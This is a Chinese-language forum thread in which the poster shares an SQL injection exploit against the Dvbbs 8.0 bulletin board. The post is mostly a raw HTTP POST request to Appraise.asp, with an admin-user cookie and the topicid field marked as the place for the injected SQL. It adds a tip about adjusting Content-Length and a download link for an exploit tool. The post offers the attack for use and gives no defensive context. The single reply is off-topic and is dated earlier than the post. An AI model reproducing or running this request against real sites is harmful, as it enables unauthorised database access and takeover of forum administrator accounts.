服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 5088|回复: 1

动网8.0sql最新注入漏洞+利用工具

[复制链接]
dirtysea 发表于 2007-11-9 19:21:58 | 显示全部楼层 |阅读模式
动网8.0sql最新注入漏洞+利用工具
POST /Appraise.asp?action=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://bbs.xxx.com... eplyID=5&skin=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: bbs.xxx.com
Content-Length: 163
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: DvForum=userid=1&usercookies=0&userclass=%B9%DC%C0%ED%D4%B1&username=admin&userhidden=2&password=r84y6115O3q4tPFJ&StatUserID=4419358; w0802=21; rtime=0; ltime=1183993930108; w08_eid=70836889-http%3A//bbs.xxx.com/index.asp%3Fboardid%3D2; ASPSESSI; upNum=0; geturl=%2Fdispbbs%2Easp%3Fboardid%3D2%26ID%3D2%26replyID%3D2%26skin%3D1; Dvbbs=ciffahcie
boardid=2&announceid=5&atype=0&a1=0&a2=0&atitle=thenines&acodestr=3361&ac&topicid=41(这里就加sql注入语句啦)

别忘记修改Content-Length


注:工具下载地址http://www.hackerspirit.com/attachments/month_0708/72007815131341.rar

破解菜鸟 发表于 2006-6-5 06:04:10 | 显示全部楼层

re:动网8.0sql最新注入漏洞+利用工具

好象是qq等级修改器,没用的,只有本机才能看见。腾讯服务器要是也能改就好了,呵呵。。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-3-28 19:47 , Processed in 0.196113 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表